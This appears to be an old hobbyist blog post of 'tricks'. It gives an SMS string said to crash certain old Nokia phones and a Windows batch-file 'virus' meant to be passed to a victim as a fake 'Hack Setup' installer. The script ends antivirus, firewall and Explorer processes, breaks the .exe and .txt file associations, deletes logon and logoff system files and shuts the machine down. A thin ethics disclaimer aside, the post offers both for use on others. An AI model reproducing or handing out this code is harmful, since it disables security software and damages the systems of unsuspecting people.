For a detail serach, try google search!!

Restart your friend’s phone using sms

Here is a trick to restart your friend's mobile via sms.With this trick only 1110,1110i,1112,1100,2100 can be restarted.

Just type
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

or 79 inverted commas

in text message and send it to your friend having mobile's mentioned above. Have fun.

Create a little virus.

Using one's knowledge in messing with other guy's computer is a cheap way to have fun and is totally against my ethics.Now, the point of this little trick is just to understand the way a simple virus works.
This virus does the following things:-
1. End Process, NAVAPSVC.exe

2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. Associate an exe file with txt (when opening exe files, it will go to notepad)
5. Associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens

Nice..uh?The funny thing is..the victim will think that he is installing some sort of hack software in his system the whole time.
Anyway....all you got to do is copy the following code and paste it in a notepad file.Save the file by some name with extension 'bat' (eg:- installhack.bat).Dont try to open the file, else you shall suffer the wrath!
____________________________________________________
title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * You have been hacked...
msg * So long..sucker...
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
____________________________________________________